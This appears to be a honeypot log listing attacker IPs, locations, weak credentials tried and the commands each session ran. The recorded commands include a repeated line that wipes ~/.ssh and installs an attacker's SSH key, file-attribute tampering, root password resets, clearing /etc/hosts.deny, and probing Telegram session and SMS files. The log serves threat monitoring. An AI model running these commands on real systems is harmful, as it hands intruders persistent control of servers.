$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

🎭 cipher_root_3 (20.203.42.204) — Dubai, United Arab Emirates · 1 session · 2 cmds

2026-04-07 15:09 EDT · as oracle/Oracle12!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 rogue_root_23 (201.249.89.102) — Caracas, Venezuela · 1 session · 2 cmds

2026-04-07 11:49 EDT · as oracle/Oracle11!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 dragon_root_17 (36.132.37.47) — Shenyang, China · 1 session · 1 cmd

2026-04-07 11:30 EDT · as root/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 star_root_13 (173.185.74.18) — Lititz, United States · 1 session · 9 cmds

2026-04-07 09:08 EDT · as root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 chai_root (172.237.38.13) — Mumbai, India · 12 sessions · 12 cmds

2026-04-06 20:53 EDT · as admin/admin, deploy/deploy, guest/guest

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×12

🎭 specter_root_47 (194.107.115.2) — Tashkent, Uzbekistan · 1 session · 2 cmds

2026-04-06 19:28 EDT · as oracle/oracle21

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 yankee_root_14 (205.164.114.7) — Albany, United States · 1 session · 1 cmd

2026-04-06 15:38 EDT · as root/1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 wok_root_27 (117.79.132.166) — Beijing, China · 2 sessions · 2 cmds

2026-04-02 03:24 EDT · as root/123456, root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m ×2

🎭 hanbok_sol_2 (221.139.88.149) — Gwanak-gu, South Korea · 1 session · 2 cmds

2026-04-06 13:21 EDT · as oracle/oracle

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 burger_root_8 (87.121.84.30) — New York, United States · 1 session · 1 cmd

2026-04-06 13:12 EDT · as root/1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 cipher_root_59 (138.226.237.129) — Belize City, Belize · 1 session · 1 cmd

2026-04-06 13:09 EDT · as root/1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 specter_root_48 (207.46.224.83) — Singapore, Singapore · 2 sessions · 2 cmds

2026-04-01 10:28 EDT · as root/1234, root/123456

grep → persistence setup

$ grep 'model name' /proc/cpuinfo 2>/dev/null | head -1 | cut -d ':' -f2- | sed 's/^ *//' | xargs || echo unknown

$ hostname; echo '___BSEP_A1B2C3___'; uname -a; echo '___BSEP_A1B2C3___'; whoami; echo '___BSEP_A1B2C3___'; pwd; echo '___BSEP_A1B2C3___'; ls -la /; echo '___BSEP_A1B2C3___'; ps aux | head -15; echo '___BSEP_A1B2C3___'; netstat -tulpn | head -10; echo '___BSEP_A1B2C3___'; history | tail -5; echo '___BSEP_A1B2C3___'; ssh -V 2>&1; echo '___BSEP_A1B2C3___'; uptime; echo '___BSEP_A1B2C3___'; mount | head -5; echo '___BSEP_A1B2C3___'; env | head -10; echo '___BSEP_A1B2C3___'; cat /etc/os-release 2>/dev/null | head -6; echo '___BSEP_A1B2C3___'; grep MemTotal /proc/meminfo 2>/dev/null; echo '___BSEP_A1B2C3___'; df -h / 2>/dev/null | tail -1; echo '___BSEP_A1B2C3___'; cat /proc/version 2>/dev/null; echo '___BSEP_A1B2C3___'; grep 'model name' /proc/cpuinfo 2>/dev/null | head -1; echo '___BSEP_A1B2C3___'; cat /etc/issue 2>/dev/null; echo '___BSEP_A1B2C3___'; last -n 3 2>/dev/null | head -3; echo '___BSEP_A1B2C3___'; ls /dev 2>/dev/null | wc -l; echo '___BSEP_A1B2C3___'; ls /var/log 2>/dev/null | wc -l; echo '___BSEP_A1B2C3___'; ls /opt 2>/dev/null; echo '___BSEP_A1B2C3___'; crontab -l 2>/dev/null | head -5; echo '___BSEP_A1B2C3___'; nproc 2>/dev/null || grep -c '^processor' /proc/cpuinfo 2>/dev/null

↳ persistence setup

🎭 crepe_root_2 (176.143.4.56) — Lyon, France · 3 sessions · 3 cmds

2026-04-06 12:10 EDT · as pi/raspberry, root/password, user/user

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×3

🎭 tulip_root_12 (213.177.179.111) — Eygelshoven, The Netherlands · 1 session · 1 cmd

2026-04-06 12:21 EDT · as root/1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 yankee_sol_7 (145.132.102.99) — Boydton, United States · 4 sessions · 4 cmds

2026-04-06 11:19 EDT · as root/admin, root/admin123, root/password

env → ps → privilege check

$ whoami ×2

↳ privilege check

$ env | head -10

$ ps aux | head -10

🎭 spice_root (172.237.38.57) — Mumbai, India · 11 sessions · 11 cmds

2026-04-06 11:07 EDT · as admin/admin, admin/admin123, deploy/deploy

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×11

🎭 burger_sol_3 (172.215.217.104) — Cheyenne, United States · 3 sessions · 3 cmds

2026-04-06 10:15 EDT · as root/12345678, root/admin123, root/password

ps → uname → env

$ ps aux | head -10

$ uname -m 2>/dev/null || echo unknown

$ env | head -10

🎭 silk_root_18 (180.106.164.102) — Nanjing, China · 2 sessions · 18 cmds

2026-04-04 04:43 EDT · as root/root

root/root login → /ip cloud print (XRP Ledger check) → ifconfig (network audit) → uname -a (OS fingerprint) → cat /proc/cpuinfo (CPU profiling) → ps | grep '[Mm]iner' & ps -ef | grep '[Mm]iner' (cryptominer scan) → ls -la ~/.local/share/TelegramDesktop/tdata/*

$ /ip cloud print ×2

$ ifconfig ×2

↳ network mapping

$ uname -a ×2

↳ OS/kernel identification

$ cat /proc/cpuinfo ×2

↳ CPU profiling

$ ps | grep '[Mm]iner' ×2

$ ps -ef | grep '[Mm]iner' ×2

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/* ×2

$ locate D877F783D5D3EF8Cs ×2

$ echo Hi | cat -n ×2

🎭 cipher_root_60 (103.119.94.10) — Mymensingh, Bangladesh · 1 session · 2 cmds

2026-04-06 09:10 EDT · as oracle/test1234

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 chai_root_8 (20.193.141.133) — Pune, India · 1 session · 2 cmds

2026-04-06 08:51 EDT · as oracle/test1234

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 wok_root_28 (14.29.208.128) — Shenzhen, China · 1 session · 2 cmds

2026-04-06 08:13 EDT · as oracle/Oracle16

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 wok_root_29 (106.37.72.234) — Beijing, China · 2 sessions · 39 cmds

2026-04-05 03:45 EDT · as oracle/Oracle16, root/pass123

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l ×2

↳ CPU profiling

$ echo -e "Oracle16\n2NilLRmqGeKZ\n2NilLRmqGeKZ"|passwd|bash

$ Enter new UNIX password:

$ echo "Oracle16\n2NilLRmqGeKZ\n2NilLRmqGeKZ\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' ×2

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' ×2

$ ls -lh $(which ls) ×2

$ which ls ×2

$ crontab -l ×2

↳ persistence setup

$ w ×2

↳ logged-in users check

$ uname -m ×2

$ cat /proc/cpuinfo | grep model | grep name | wc -l ×2

↳ CPU profiling

$ top ×2

↳ process monitoring

$ uname ×2

↳ OS identification

$ uname -a ×2

↳ OS/kernel identification

$ whoami ×2

↳ privilege check

$ lscpu | grep Model ×2

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' ×2

$ echo "root:0ihOw5kBLlri"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

🎭 stein_root_17 (161.35.79.145) — Frankfurt am Main, Germany · 1 session · 1 cmd

2026-04-06 06:41 EDT · as admin/admin123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 phantom_root_36 (103.230.120.88) — Bangkok, Thailand · 1 session · 1 cmd

2026-04-06 05:39 EDT · as deploy/deploy

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 liberty_root_14 (66.154.124.165) — Washington, United States · 1 session · 2 cmds

2026-04-06 04:07 EDT · as oracle/oracletest

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 cipher_root_61 (94.74.114.67) — Bangkok, Thailand · 1 session · 2 cmds

2026-04-06 01:00 EDT · as oracle/Oracle27!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 phantom_root_37 (103.173.154.45) — Phúc Điền, Vietnam · 2 sessions · 4 cmds

2026-04-06 00:18 EDT · as oracle/Oracle!, oracle/oracle#

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

🎭 wraith_root_42 (118.26.36.248) — Hong Kong, Hong Kong · 1 session · 2 cmds

2026-04-06 00:08 EDT · as oracle/Oracle27!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 shadow_root_9 (165.154.227.158) — Taipei, Taiwan · 1 session · 2 cmds

2026-04-06 00:07 EDT · as oracle/Oracle27

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 lantern_root (106.14.183.112) — Shanghai, China · 40 sessions · 40 cmds

2026-04-05 20:27 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×40

🎭 specter_root_49 (103.186.1.202) — Sukabumi, Indonesia · 1 session · 1 cmd

2026-04-05 16:15 EDT · as ubuntu/ubuntu

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 specter_root_50 (154.198.215.50) — Hong Kong, Hong Kong · 1 session · 2 cmds

2026-04-05 15:23 EDT · as oracle/oracle4

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 star_root_3 (107.180.88.176) — Ashburn, United States · 1 session · 2 cmds

2026-04-05 15:06 EDT · as oracle/oracle4

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 ghost_root_66 (202.79.29.108) — Phnom Penh, Cambodia · 1 session · 2 cmds

2026-04-05 14:46 EDT · as oracle/oracle4

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 cowboy_root_13 (45.61.187.220) — Miami, United States · 1 session · 19 cmds

2026-04-05 14:43 EDT · as root/admin

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:37zE4gYOs2Rc"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 ghost_root_67 (160.250.181.122) — Ho Chi Minh City, Vietnam · 1 session · 2 cmds

